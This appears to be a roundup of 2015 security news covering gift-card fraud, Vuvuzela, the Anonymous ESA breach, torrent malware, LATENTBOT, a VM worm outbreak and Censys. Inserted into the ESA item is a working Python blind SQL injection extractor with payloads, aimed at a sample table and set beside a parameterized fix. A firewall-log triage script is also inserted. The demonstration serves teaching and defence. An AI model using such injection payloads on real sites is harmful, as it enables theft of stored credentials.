Be careful when using gift cards, cyber criminals have learned how to exploit this popular form of gift-giving, especially during the Holiday season.
Every day, dozens of gift cards from top retailers are offered for sale online. Some of these are legitimate gift cards sold through third-party sites that resell used or unwanted cards, but a good portion are the result of illegal activities.

Some discounted gift cards are in fact the product of merchandise return fraud.

As explained by the security expert Brian Krebs, this kind of scam mainly impacts retailers that issue gift cards when clients return merchandise at a store without presenting a receipt.

Brian Krebs reported the case of one of his readers, who was aware that crooks steal merchandise from one physical store in a retail chain, return it to another store of the same chain without a receipt, and then offer the resulting gift cards for sale on websites like and at a discounted price.

Many stores, for returns made more than 60 days after purchase or without a receipt, refund the value of the returned goods to a merchandise card rather than in cash.

Krebs’s reader confirmed she was not aware that the card was a merchandise return card, a fact that was printed on the front of the card she received.

Searching for gift cards available for sale online, Krebs discovered that the cards are routinely sold for at least 25 percent off their value.

“Clothier H&M’s cards average about 30 percent off.”

Krebs made other interesting discoveries by analysing discounts for industries that don’t take customer returns (e.g. fuel stations, restaurants). Cards from merchants that don’t take customer returns tend to carry much lower discounts, between 3 and 15 percent (e.g. gift cards from Starbucks and Chevron).

Twenty-five percent off is really high and experts invite customers to be wary of such offers.

“Normally, it is around 5 percent to 15 percent.” said Damon McCoy, an assistant professor at New York University and an expert on fraud involving stored value cards.
This means we are facing a well-established illegal activity, one that according to the National Retail Foundation will cost U.S. retailers nearly $11 billion this year.

“Investigators say the crimes very often are tied to identity theft rings and drug addicts. Last month, authorities in Michigan convicted a 46-year-old father of four for running a large-scale fencing operation that used teams of prostitutes, heroin users, parolees and panhandlers to steal high-priced items from local Home Depot stores and then return the goods to a different Home Depot location in exchange for store debit cards.” wrote Krebs in a blog post.

Clearly, gift cards are also a favoured cash-out method for criminals specialising in the sale of stolen credit cards. Crooks use stolen card data to buy gift cards from a range of retailers and offer them for sale online at 20-30 percent discounts.

Is Vuvuzela the most secure SMS text messaging system?

A group of computer scientists at the Massachusetts Institute of Technology has developed the most secure SMS text messaging system.
A group of computer scientists at the Massachusetts Institute of Technology (MIT) has developed a new SMS text messaging system, dubbed Vuvuzela, that is untraceable and could allow truly anonymous communications.

The researchers explained that their SMS text messaging system is resilient to traffic analysis, and so more secure than the Tor anonymity network.

“Tor operates under the assumption that there’s not a global adversary that’s paying attention to every single link in the world,” said Nickolai Zeldovich, an associate professor of computer science and engineering, and co-leader of the Parallel and Distributed Operating Systems group at CSAIL.

“Maybe these days this is not as good of an assumption. Tor also assumes that no single bad guy controls a large number of nodes in their system. We’re also now thinking, maybe there are people who can compromise half of your servers.”

Scientists from MIT and the Qatar Computing Research Institute (QCRI) claimed in July to be able to de-anonymize Tor hidden servers with up to 88% accuracy. The researchers demonstrated how to unmask Tor hidden services by analyzing the traffic patterns of encrypted data passing through a single machine in the Tor network.

The researchers demonstrated that “simply by looking for patterns in the number of packets passing in each direction through a guard, machine-learning algorithms could, with 99 percent accuracy, determine whether the circuit was an ordinary Web-browsing circuit, an introduction-point circuit or a rendezvous-point circuit.”

“Furthermore, by using a Tor-enabled computer to connect to a range of different hidden services, they showed that a similar analysis of traffic patterns could identify those services with 88 per cent accuracy. That means that an adversary who lucked into the position of guard for a computer hosting a hidden service, could, with 88 per cent certainty, identify it as the service’s host,” states MIT’s full press release.

In October, the researchers presented their paper, titled “Vuvuzela: Scalable Private Messaging Resistant to Traffic Analysis” at the Association for Computing Machinery Symposium on Operating Systems Principles.

“Vuvuzela is a new scalable messaging system that offers strong privacy guarantees, hiding both message data and metadata. Vuvuzela is secure against adversaries that observe and tamper with all network traffic, and that control all nodes except for one server” states the paper.

A user who needs to send a message to another user leaves it at a specific location, such as a memory address on an internet-connected dead-drop server, and their interlocutor then retrieves the message from the same location.

In the simplest scenario, with three people using the system but only two of them sending text messages to each other, an attacker analyzing the traffic to the server is able to identify the two users who exchanged messages.

To defeat traffic analysis in this scenario, all users, even those not involved in any communication, send regular messages to the dead-drop server, rendering traffic analysis ineffective.

In this case, a persistent attacker running traffic analysis will only be able to see traffic going through the server from multiple locations at all times.

The researchers explained that sending out regular spoof messages is not enough on its own, because an attacker could infiltrate the dead-drop server itself. In that case the attacker would be able to see which users were actually sending messages and who their interlocutors were.

To make Vuvuzela resilient to this kind of attack, the SMS text messaging system uses three different dead-drop servers.

All the messages, real and fake, are sent through the system wrapped in three layers of encryption.

“To make sure that exchange requests get mixed, each client encrypts their request with the public key of each server. If there are three servers, with public keys pk1, pk2, and pk3, then a user encrypts their request r to form Epk1(Epk2(Epk3(r))). This onion construction ensures that the request r can be decrypted only if each server removes its encryption layer in turn,” states the paper.

The first server peels off the outer layer of encryption from each message and forwards it to the second server. The first server also shuffles the order of the messages, and the second server does the same, so only the third server can read the real messages.

The three layers of encryption allow the Vuvuzela SMS text messaging system to remain effective even if one of the servers is compromised.

Cyber Terrorists Can Get Their Hands on UK Infrastructure, Like the Net or Electricity

Cyber terrorists can target UK infrastructure, with the odds being in favor of targeting the power grid, rather than the Internet broadband network.
Cyber terrorists are probably going to target the UK and, more specifically, focus on something that will create chaos in the country. After the devastating attacks in Paris in November, many people fear that ISIS and other extremist attackers will not rest; instead, they will keep escalating and spreading terror all over the world. As far as the United Kingdom is concerned, some claim that the internet broadband network would be an easy target. However, when it comes to escalation and severe damage, an attack on the electric grid would be far more catastrophic.

Of course, the net would go down too if the lights went out all over the country. Furthermore, a successful attack by cyber terrorists against the power grid would jeopardize human lives, which is what the extremists are after. So it makes sense that electric power would be a more suitable target for them. Either way, such attacks would demand well-planned strategies and perfect coordination.

James Blessing, Chair of the Internet Service Providers Association (ISPA), has commented on the possibility of cyber criminals targeting the UK network. He said that there are multiple locations to target and that these locations were built to be impenetrable:

“These places are not unsecure, they are in highly-guarded locations that as a network engineer are a pain to get into. They are in high security buildings and there’s usually a perimeter fence that is well away from the building. You would have to have a seriously big truckful, you’re talking a load of fertiliser bigger than the IRA used to use.”
On the question of targeting, Mikko Hyppönen, Chief Research Officer at the security firm F-Secure, gave his view:

“The Islamic State has demonstrated that they have the most credible offensive cyber capability of any of the jihadist extremist movements, and even they are far away from having this level of operational skills at their disposal … Why bother toying around taking down the net if you could take down the electric grid?”
An example of resilience in government infrastructure worth considering is Estonia. Since 2007, its entire government infrastructure can fail over immediately to servers abroad without jeopardizing any of the data. By not being physically tied to one place, Estonia has largely eliminated the risk of being hit at a specific location.

In the light of this growing need for online protection, Britain has announced £1.9bn of funding over five years to safeguard the country against cyber attacks, as well as the creation of a National Cyber Centre in the coming year, 2016.

European Space Agency domains hacked by Anonymous

The collective Anonymous has compromised the subdomains of the European Space Agency website and leaked personal information of thousands of subscribers and officials.
The hacking collective Anonymous has been very active lately; its latest victim is the European Space Agency. Members of Anonymous breached a number of subdomains of the European Space Agency website and leaked the personal data and login credentials of thousands of subscribers and officials.

”We did it for the Lulz” is the message left by Anonymous.


Anonymous attacked several subdomains of the European Space Agency (ESA) website.
The hackers exploited a blind SQL injection vulnerability to access the backend of the subdomains and exfiltrate data from the database.

The journalists who disclosed the news analyzed the data leaked online by Anonymous and confirmed its authenticity. Anonymous leaked the stolen data in three separate files, containing the website’s database, officials’ personal information and subscribers’ data.

“The third file contains names, emails and clear-text passwords of 8000+ subscribers. The leaked data is available here → Database | Officials’ data | Subscribers’ data.”

Anonymous reported to HackRead the following message:


The branch of the Anonymous collective that hacked the European Space Agency appears to be the same one that breached the databases of the United Nations Climate Conference (COP21) and the World Trade Organization.

Incidents of this kind open the door to further cyber attacks: the leaked data includes information on officials who could be targeted by criminal groups or nation-state actors for espionage.
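As an added illustration (not part of the original report, and unrelated to ESA's actual systems or the attackers' real payloads), the following Python shows what a boolean-based blind SQL injection looks like against a constructed in-memory SQLite table, and how the same probing payloads fail against a parameterized query. The schema, the rows and the `subscriber_exists_*` functions are hypothetical stand-ins for a "does this subscriber exist" endpoint that only answers yes or no.

```python
import sqlite3
import string


def make_db():
    """Constructed in-memory sample table (hypothetical schema and rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE subscribers (id INTEGER PRIMARY KEY, email TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO subscribers (email, password) VALUES (?, ?)",
        [("alice@example.org", "hunter2"), ("bob@example.org", "s3cret")],
    )
    return conn


def subscriber_exists_vulnerable(conn, email):
    """Vulnerable: untrusted input is spliced straight into the SQL text.
    The caller only sees True/False, which is all a blind attack needs."""
    sql = "SELECT 1 FROM subscribers WHERE email = '%s'" % email
    return conn.execute(sql).fetchone() is not None


def subscriber_exists_safe(conn, email):
    """Hardened: a bound parameter is treated as data, never as SQL syntax."""
    sql = "SELECT 1 FROM subscribers WHERE email = ?"
    return conn.execute(sql, (email,)).fetchone() is not None


def blind_extract(oracle, column, row_id, max_len=32):
    """Boolean-based blind extraction: ask the yes/no oracle about one
    character position at a time; stop when no candidate matches (end of value)."""
    alphabet = string.ascii_letters + string.digits + "@._-"
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            # The closing quote of the original query is commented out with "--".
            payload = (
                "x' OR (SELECT substr(%s,%d,1) FROM subscribers WHERE id=%d)='%s' -- "
                % (column, pos, row_id, ch)
            )
            if oracle(payload):
                hit = ch
                break
        if hit is None:
            break
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = make_db()
    leak = blind_extract(lambda p: subscriber_exists_vulnerable(db, p), "password", 1)
    blocked = blind_extract(lambda p: subscriber_exists_safe(db, p), "password", 1)
    print("vulnerable endpoint leaked:", repr(leak))       # 'hunter2'
    print("parameterized endpoint leaked:", repr(blocked))  # ''
```

Each recovered character costs roughly one request per alphabet entry, which is why blind injection against a site with thousands of rows is slow but perfectly feasible for an automated tool; the parameterized version never evaluates the attacker's text as SQL, so the loop ends at the first position.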

Torrent websites infected 12 million Internet users per month

According to a new study conducted by researchers at Digital Citizens Alliance and RiskIQ almost one-third of the 800 torrent websites served malware.
Many people believe the best way to see a film or get software is to download it from one of the numerous torrent websites. There is something you should know first.

According to a new study conducted by researchers at Digital Citizens Alliance and RiskIQ, almost one-third of 800 torrent sites served malware to users’ machines between June and August 2015.

About 12 million Internet users per month were infected by downloading material from torrent sites.

The experts cited the case of the newly released video game Fallout 4, a pirated copy of which was found to embed malicious code used by crooks to steal 4.88 bitcoins (nearly 2,000 USD) from a gamer’s PC.

The researchers revealed that most torrent websites earn money by selling ads to malicious advertisers who serve malware, which criminal organizations use to harvest users’ data for resale on the black market.

According to the experts, the profit of this lucrative business allowed crooks to earn more than 70 million dollars.

“Baiting Internet users, stealing their personal information, and taking control of their computers is becoming big business—an estimated $70 million per year just from peddling malware.” states the report.

Most of the computers are infected via malicious ads spread through the torrent websites, the ads redirect victims to websites hosting malicious exploit kits.

“When you visit mainstreams sites, things are naturally happening without you clicking anything: pictures are being downloaded, ads are generating,” said Tom Galvin, executive director of Digital Citizens Alliance. “What’s happening now is that users can click on one of these content sites and decide not to watch a movie, but the malware is already on their computer scraping for their Social Security number. That’s used to mimic and adopt your online persona, access banking information, and in some cases, people are getting credit fraud notifications.”


Movie hubs deliver the majority of malware as explained by Galvin.

“Movies are digital bait,” added Galvin. “Consumers are defenseless, and this is really exploiting and abusing them.”

The researchers compared mainstream sites such as Crackle and Hulu with torrent and streaming sites such as The Pirate Bay, Kickass Torrents, ExtraTorrent, multiple Torrentz forks, Putlocker and others.

Two percent of the mainstream sites were found serving malware each month and 33 percent of sites in the Content Theft Sample group had at least one malware incident in one month.

54 percent of all malicious code detected was classified as Trojan, 29 percent as adware.


The researchers detected numerous variants of Remote Access Trojans (RATs), which crooks use to steal financial information and login credentials and even to access a laptop’s camera.

The study includes the Top 10 RATs identified by the researchers, some of them are well-known threats used in numerous attacks in the wild. Xtreme Rat and Bifrost lead the list.


Unfortunately online piracy is one of the most profitable illegal activities, and curbing it represents a major challenge for law enforcement.
You can do your part by not downloading content from websites that expose you to cyber attacks and infections.

The full report is worth a read.

Iranian Government says Daesh doesn’t pose a threat to Iran


The Iranian Cyber Police (FATA) is actively monitoring the activities of the Daesh terrorist group (ISIS) in the country.
“Live by the sword, die by the sword”: Iranian hackers are intensifying their activities against Western countries, and security firms have recently uncovered several cyber espionage campaigns targeting US and European organizations.

In November, experts from Check Point firm published a new report on the Rocket Kitten group, revealing the intensification of the Iranian activities in the cyberspace.

But Iranian experts are aware of possible threats originating from cyberspace, not only from Western governments but also from militants of the ISIS terrorist group.

Daesh has a credible offensive cyber capability: that is the opinion of security expert Mikko Hyppönen, who is worried about cyber terrorists belonging to the Islamic State (Daesh, ISIL or ISIS).

Daesh is also a concern for the Iranian Government. Last week, Brigadier General Kamal Hadianfar, chief of the Iranian Cyber Police (FATA), announced at a Monday press conference that FATA had identified and admonished an individual spreading the rumor that Daesh might pose a cyber threat to Iran. Hadianfar explained that the man admitted his error but insisted he had done nothing illegal.

“Hadianfar told a press conference that the person spreading the rumor that Daesh will pose threat to Iran on December 11 has been identified. He added he is living in northern Iran.” states a report published by the Islamic Republic News Agency (IRNA).

“FATA admonished the person for the issue, he said adding the person admitted to have made mistake, but, insisted that he has not committed any crime.”

According to the Islamic Republic News Agency (IRNA), the Chief Brigadier General Kamal Hadianfar explained that the FATA is monitoring the evolution of Daesh in the country, especially the activities exploiting the technological means.

He confirmed that 132 websites linked to the terror group ISIS had been identified and shut down, and that all propaganda initiatives had been nipped in the bud.

The commander of the Islamic Revolution Guards Corps (IRGC) likewise confirmed that Daesh has posed no serious cyber attack threat.

I personally consider it a serious error to underestimate any cyber threat, including ISIS’s cyber capabilities.

The ISIS has the ability to make fake Syrian passports


A new intelligence report shared with law enforcement warns of ISIS’s ability to create fake Syrian passports, raising alarm.
According to a report issued by US intelligence, ISIS has the ability to create fake Syrian passports; the news was confirmed this week by a federal official.

The news was reported by ABC News and CNN; a spokeswoman for U.S. Immigration and Customs Enforcement confirmed the existence of the report but declined to provide a copy of it.

ABC News, which first reported the existence of the report on Thursday, confirmed that it was released to law enforcement by the Homeland Security Investigations agency. US intelligence believes that the fake passports could be used by members of the ISIS organization to travel to the United States.

According to the US intelligence, members of the ISIS terrorist group have access to Syrian government passport printing machines and blank passports. This means that the organization is able to print travel documents for its members.

“The report warned that, based on U.S. Immigration and Customs Enforcement’s intelligence sources, ISIS has access to passport printing machines and blank passport books, raising the possibility the documents could be faked, according to the source.” states the CNN.

According to CNN, there was also concern that, because ISIS members had access to biographical and fingerprint data on Syrian citizens, Syrians could be exposed to identity theft.


“The source noted that, beyond the report, there’s concern that this capability coupled with ISIS access to government buildings in Syria that contain valid biographical data and fingerprint info on Syrian citizens give rise to the threat of identity theft.” continues the CNN.

The experts do not exclude that ISIS has already used fake passports to enter the US.

“Since more than 17 months [have] passed since Raqqa and Deir ez–Zour fell to ISIS, it is possible that individuals from Syria with passports ‘issued’ in these ISIS-controlled cities or who had passport blanks, may have travelled to the U.S.,” states the ABC News.

FBI Director James Comey discussed the issue this week in testimony on Capitol Hill.

“The intelligence community is concerned that they [Islamic State] have the ability, the capability to manufacture fraudulent passports, which is a concern in any setting.” said the FBI Director.

Maine Independent Sen. Angus King told CNN that the US is moving toward a new generation of passports that cannot be faked thanks to a chip carrying biometric data.

“I think this tells us that we’ve got to accelerate doing that. But in the world of threats, of course, this is the one of them, but there are lots of other things we have to attend to as well,” King said.

LATENTBOT, one of the most highly obfuscated backdoors in the wild

Experts at FireEye have discovered a stealthy botnet relying on a backdoor called LATENTBOT that has compromised companies in several countries.
According to FireEye, LATENTBOT remained undetected since 2013 and in 2015 infected computers in the US, UK, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland.

“FireEye Labs recently uncovered LATENTBOT, a new, highly obfuscated BOT that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.” states the report published by FireEye.

The experts observed multiple campaigns targeting multiple industries, but the threat actors appear to be focused on the financial services and insurance sectors.

FireEye has uncovered similar samples in the wild over time; using passive DNS information, its experts dated the bot to around mid-2013.

Taking a detailed look at the LATENTBOT botnet, the experts discovered that it implements a 6-stage obfuscation process, operates completely in memory (LATENTBOT keeps its code in memory only for the short time needed to infect the target), and implements a single exfiltration mechanism.

Below is the list of features implemented by the LATENTBOT backdoor:
a) Multiple layers of obfuscation
b) Decrypted strings in memory are removed after being used
c) Hiding applications in a different desktop
d) MBR wiping ability
e) Ransomlock similarities such as being able to lock the desktop
f) Hidden VNC Connection
g) Modular design, allowing easy updates on victim machines
h) Stealth: Callback Traffic, APIs, Registry keys and any other indicators are decrypted dynamically
i) Drops Pony malware as a module to act as infostealer

LATENTBOT is able to scan for cryptocurrency wallets via Pony stealer 2.0 malware plugin, it uses a custom encryption algorithm to protect command and control (C2) communications.

“LATENTBOT itself is not targeted in nature – it has been observed in multiple industries – but it is selective in the types of Windows systems to infect. For example, it won’t run in Windows Vista or Server 2008. LATENBOT also uses compromised websites as CnC infrastructure, making infection easier and detection harder.”

The researchers discovered that when the bot runs on a laptop it queries the battery status via GetSystemPowerStatus and calls SetThreadExecutionState to prevent the system from entering sleep mode.

The threat actors use email as the attack vector: their malicious messages carry an old Word exploit generated with the Microsoft Word Intruder (MWI) exploit kit. When a victim opens the document, an embedded malicious executable runs, contacts the C&C server for campaign tracking and downloads the second-stage binary, which turns out to be the LuminosityLink RAT.

“During our analysis, the Word documents downloaded LuminosityLink as the second stage binary. LuminosityLink is a full-featured RAT that has the ability to steal passwords, record keystrokes, transfer files and activate attached microphones or webcams.” continues the report.

“Since the running LuminosityLink is a RAT that offers multiple capabilities to fully control the infected box, it is surprising that another payload is being downloaded from a secondary C2 at emenike[.] (,” FireEye detailed. That new module is LATENTBOT.


The report published by FireEye includes full details on the backdoor.

Real chaos with virtual machines

13.12.2015 Threats
It started as a simple call to the support line from an employee at one of our main development centers: phone calls there were dropping. Soon similar complaints came in from other users, and also from salespeople, who mentioned that being unable to keep a phone call going was making it considerably harder to close deals.

Anything that affects revenue is sure to get someone's immediate attention. The telecom team checked the configuration of our Cisco Call Manager application and the VoIP gateway, and everything was in order.

A somewhat surprising source

The help desk then also received a number of complaints about excessively slow Internet connectivity, from the same development center. Some people decided to call in the security department as well.

The head of our network management department, who is also responsible for firewall administration, sent me a message that immediately got my attention: "You'd better come and look at this." He showed me the logs of the firewall protecting the development center, which were full of outbound connections on port 445 to several locations on the Internet.

We had to stop this activity quickly so that Internet access and the phone service could be restored. Our attempt to block the outbound traffic at the firewall failed, because the logging had consumed so much of the firewall's resources that we could do practically nothing on it.

So the network engineer placed an access control list on one of the routers, which eventually allowed him to modify the affected firewall's rule and block the malicious traffic. That measure restored Internet and phone service, resolving the immediate problems. But what had caused them? Fortunately our engineer had a backup of the logs, so we could analyze the data at leisure.
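As an added example (not from the original column), here is how that firewall-log triage can be done programmatically in Python: parse the log, find internal hosts that opened TCP/445 connections to several distinct external destinations, and emit the router ACL entries used to contain them while the firewall is unresponsive. The log layout, the sample lines, the internal address ranges and the Cisco-style ACL syntax are all assumptions made for the illustration; adapt the regular expression to the real firewall's format.

```python
import ipaddress
import re
from collections import defaultdict

# Assumed internal address space (RFC 1918); replace with the real enterprise ranges.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample in a generic "ts action proto src -> dst" layout; the column
# does not reproduce the real firewall's log format.
SAMPLE_LOG = """\
2015-12-09T10:01:02 ACCEPT TCP 10.20.30.41:49211 -> 203.0.113.7:445
2015-12-09T10:01:02 ACCEPT TCP 10.20.30.41:49212 -> 198.51.100.9:445
2015-12-09T10:01:03 ACCEPT TCP 10.20.30.41:49213 -> 192.0.2.55:445
2015-12-09T10:01:03 ACCEPT TCP 10.20.30.42:50001 -> 203.0.113.7:445
2015-12-09T10:01:04 ACCEPT TCP 10.20.30.42:50002 -> 198.51.100.9:445
2015-12-09T10:01:04 ACCEPT TCP 10.20.30.42:50003 -> 192.0.2.56:445
2015-12-09T10:01:05 ACCEPT TCP 10.20.30.5:51000 -> 10.20.1.10:445
2015-12-09T10:01:06 ACCEPT TCP 10.20.30.77:51500 -> 93.184.216.34:443
2015-12-09T10:01:07 ACCEPT UDP 10.20.30.41:5060 -> 10.20.1.20:5060
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>\S+)\s+(?P<proto>TCP|UDP)\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$"
)


def parse_line(line):
    """Parse one log line into a dict; return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["sport"], rec["dport"] = int(rec["sport"]), int(rec["dport"])
    return rec


def is_internal(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def find_smb_spreaders(log_text, min_external_targets=2):
    """Return {source: sorted external destinations} for every internal host that
    opened TCP/445 to at least min_external_targets distinct external hosts.
    SMB to internal file servers is normal traffic and is ignored."""
    targets = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["proto"] != "TCP" or rec["dport"] != 445:
            continue
        if is_internal(rec["dst"]) or not is_internal(rec["src"]):
            continue
        targets[rec["src"]].add(rec["dst"])
    return {src: sorted(dsts) for src, dsts in targets.items()
            if len(dsts) >= min_external_targets}


def containment_acl(spreaders):
    """Emit router ACL entries (assumed Cisco IOS extended-ACL syntax) that drop
    outbound SMB from the flagged hosts and leave everything else untouched."""
    lines = [f"deny tcp host {src} any eq 445 log"
             for src in sorted(spreaders, key=ipaddress.ip_address)]
    lines.append("permit ip any any")
    return lines


if __name__ == "__main__":
    hits = find_smb_spreaders(SAMPLE_LOG)
    for src, dsts in hits.items():
        print(f"{src} -> {len(dsts)} external SMB targets: {', '.join(dsts)}")
    print("\n".join(containment_acl(hits)))
```

The threshold on distinct external destinations is what separates a worm scanning the Internet from a single legitimate (if unwise) SMB connection; in a real investigation you would also group by time window and feed the flagged hosts to the classroom inventory, as the column's author did by hand.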

The review showed that the IP addresses generating the traffic had been assigned to a classroom. The instructor told me that the participants in one of the courses had installed a server image on the classroom desktops and, contrary to the classroom's usual protocol, connected the virtual machines directly to the corporate network.

We found that these virtual machines contained no antivirus software and had not been patched for more than two years, so we ran an antivirus program and scanned one of them. Suddenly everything was clear.

The virtual machine was infected with a virus whose characteristics matched the activity that had caused the denial of service. In fact all 30 desktops in the classroom were infected. And that was not the worst of it.

The installed images were derived from a base image maintained at a cloud provider, which itself contained the virus, which explains how all 30 machines became infected.

Without patches

I contacted the person responsible for provisioning the virtual machine images to find out why no steps had been taken that could have prevented such an infection. She explained that a few years earlier some patches had caused instability in the images, so patching had been stopped.

As for antivirus software, that person stated that there had been no budget to install it on more than 1,500 Microsoft Windows images. Perhaps that explanation was meant to reassure me, but I could not hide my dismay.

Fifteen hundred virtual machine images had minimal or no protection against virus infection! And these images were regularly used in several of our departments, on computers connected to the corporate network.

I immediately requested a meeting with our head of IT and the vice presidents of the departments that deploy virtual machines. I asked for an immediate mandate to scan all the images, install our corporate antivirus software, install all patches, and put in place a process ensuring that the images comply with our company's patch management process.

And I had to get all of this done within a single working day.

The French Gov will block neither Tor nor free Wi-Fi

According to French Prime Minister Manuel Valls, the Government will not ban public Wi-Fi or the Tor network.
Last week, documents leaked to Le Monde suggested that the French Government was planning to adopt drastic measures in response to the terrorist threat, including a ban on the Tor network and restrictions on public Wi-Fi.

The proposals appeared in an internal Ministry of the Interior document seen by journalists at the French newspaper Le Monde; Prime Minister Manuel Valls has since ruled out introducing those restrictions in response to the Paris terrorist attacks.

The document includes two proposals of legislation, one around the state of emergency, and the other related to counterterrorism measures.

The French Government was considering a measure to “Forbid free and shared wi-fi connections,” intended to prevent abuse of public Wi-Fi networks: law enforcement finds it difficult to track suspects and terrorists who use them.

Under the proposed legislation, the French Government was also planning to give the authorities more powers, including enforced GPS tracking of rented cars, the blocking of Tor connections and the use of cellphone eavesdropping systems.


“Internet freedom is a great way to communicate with people, that’s a plus for the economy,” said Valls, adding that it was “also a way for terrorists to communicate and spread their totalitarian ideology.” “The police look at all the aspects that better fight against terrorism, of course, but we must take effective measures.”

But Valls clarified that the French Government will not ban the popular Tor network, nor monitor its use. He said he had seen no proposals for such a scheme.

Anonymous Declares War On Donald Trump — #OpTrump
After targeting the Islamic State (ISIS) group in the wake of the deadly terror attacks in Paris, the hacktivist group Anonymous has now turned its attention to controversial US presidential candidate Donald Trump.
The hacktivist group has declared war against Donald Trump following his recent radical speech stating he wanted to ban Muslims from entering the United States.
Anonymous vs. Donald Trump
On Wednesday, Anonymous slammed Trump in a YouTube video in which a man in a Guy Fawkes mask says:
"Donald Trump, it has come to our attention that you want to ban all Muslims to enter the United States. This policy is going to have a huge impact. This is what ISIS wants. The more Muslims feel sad, the more ISIS feels that they can recruit them. Donald Trump, think twice before you speak anything. You have been warned, Donald Trump."

Anonymous Takes Down Donald Trump Website
Moreover, the group launched the #OpTrump hacking campaign against Donald Trump on Wednesday night and took down the website for New York City's Trump Towers by hitting it with Distributed Denial-of-Service (DDoS) attacks.
The website was reportedly down for hours, but it appears to be operational now.
While the hacktivist group has yet to officially claim responsibility for the DDoS attack on Trump's website, Twitter users showed their full support for Anonymous and its #OpTrump campaign.
This is not the first time the group has targeted Trump. A few months ago, Anonymous broke in to deliver a message to Jon Stewart as he was about to leave The Daily Show.
As we await Anonymous's next move, the group has already declared Friday a day to troll ISIS, urging Twitter users to do so under the #Daeshbags hashtag.
This Hack Lets You Find Which of Your Facebook Friends Like Trump
Meanwhile, a website has been created to show you which of your Facebook friends have "Liked" Donald J. Trump.
Clicking through the site takes you to a Facebook search that shows what your friends have liked; you can achieve the same yourself by simply typing "My friends who like Donald J. Trump" in the Facebook search bar.
You will get a list of anyone in your Facebook network who has clicked "Like" on Trump's Facebook page.

UK Gov could hack children’s smart toys to Spy on suspects

As part of the Investigatory Powers Bill, the British Government could hack children’s smart toys to snoop on suspects.
We have discussed several times the possibility of spying on people through smart devices, including smart toys. A couple of weeks ago, security expert Matt Jakubowski showed that the new Wi-Fi-enabled Hello Barbie can be hacked to extract Wi-Fi network names, account IDs and MP3 files from the toy.

News of the day is that as part of the Investigatory Powers Bill, children’s smart toys could be used by British law enforcement.


According to Antony Walker, deputy chief executive officer of techUK, IoT devices, including smart toys, could be intercepted by the UK government and used in investigations.

“In the context of the Internet of Things you have many types of connected devices … [such as] toys [that] children can interact [with],” Mr. Walker said at the second evidence session on the Investigatory Powers Bill:

“These devices may sit in a child’s bedroom, but they may be accessible. In theory, the manufacturer of the products could be subject to a warrant to enable equipment interference with those devices.”

The expert highlighted the implication of smart objects for the users’ privacy and security.

“We are moving beyond a world that is just about telephony, accessing messaging services and so on,” he stated.

“In an IOT type world the definitions that seem to apply to equipment seem to apply potentially to a huge range of devices that could be used for communications purposes and other purposes as well.”

The draft Investigatory Powers Bill would make it the legal duty of Internet service providers (ISPs) to support the law enforcement in exploiting smart devices, including smart toys, to snoop on suspects.
“A range of devices that have been in the news recently, in relation to a hack, are children’s toys that children can interact with,” Walker told the committee. “These are devices that may sit in a child’s bedroom but are accessible.”
Under the Investigatory Powers Bill, the UK Government also proposes to make it possible to break the end-to-end encryption that private companies implement for their services.

You can keep the larger free space on OneDrive, just click
A month ago Microsoft surprised everyone by announcing a change to the free capacity on its OneDrive cloud storage. From February, the free quota for all users will drop from 15 GB to 5 GB, and the earlier bonuses for enabling automatic photo upload will be withdrawn too. Users did not like it and told Microsoft so with strong feedback. The company reacted and offered a solution.

You can keep your free OneDrive capacity

That solution is the option to keep the current level of free space on OneDrive. All you need to do is click here and confirm that you want to keep the larger free space on your account. Microsoft thus accommodates existing users who want the extra space, while freeing up capacity thanks to everyone else who does not take up the option.

Hacker-Friendly Search Engine that Lists Every Internet-Connected Device
Meet an all-new Hacker’s Search Engine similar to Shodan – Censys.
At the end of last month, security researchers from SEC Consult found that lazy manufacturers of home routers and Internet of Things (IoT) devices had been re-using the same set of hard-coded cryptographic keys, leaving around 3 million devices open to mass hijacking.
But how did the researchers arrive at this number?
They uncovered these devices with the help of Censys, a new search engine that scans the whole Internet daily and indexes the devices it finds, vulnerable ones included.
Censys Maintains Complete Database of Everything on The Internet
Censys is similar to hacker's search engine Shodan, which is designed specifically to locate any devices that have been carelessly plugged into the Internet without much attempt at preventing unauthorized access.
However, Censys employs a more advanced method to find vulnerabilities in the devices and make the Internet a safer place.
Censys is a free search engine that was originally released in October by researchers from the University of Michigan and is powered by the world's biggest search engine Google.
Censys is part of an open source project that aims at maintaining a "complete database of everything on the Internet," helping researchers and companies unearth Online security mishaps and vulnerabilities in products and services.
How Does Censys Work?
Censys collects information on hosts and websites via daily scans of the IPv4 address space – the internet protocol version 4 that routes the majority of the Internet traffic today.
In order to do so, the new search engine uses two companion tools:
ZMap – an open-source network scanner
ZGrab – an application layer scanner
Censys then maintains a database of how hosts and websites are configured, allowing researchers to query the data through a search interface, report builder, and SQL engine.
ZMap scans over 4 Billion IP addresses on the Internet and collects new data every day. It also helps determine whether the machines on the internet have security vulnerabilities that should be fixed before being exploited by the hackers.
"We have found everything from ATMs and bank safes to industrial control systems for power plants. It's kind of scary," said Zakir Durumeric, the researcher leading the Censys project at the University of Michigan.
Obvious flaws in addition to issues caused by IT administrator failures can also be found.
Here's the MIT Technology Review on Censys, titled "A Search Engine for the Internet’s Dirty Secrets."
More details on the Censys architecture and functionalities are available in the team's research paper.
If you would like to give Censys a try, you can follow the step-by-step tutorial offered by the developers.

A well-funded cyber criminal group targets Asian organizations


Trend Micro reports that the Asian market is being targeted more than ever by a well-funded, highly organized cyber criminal group.
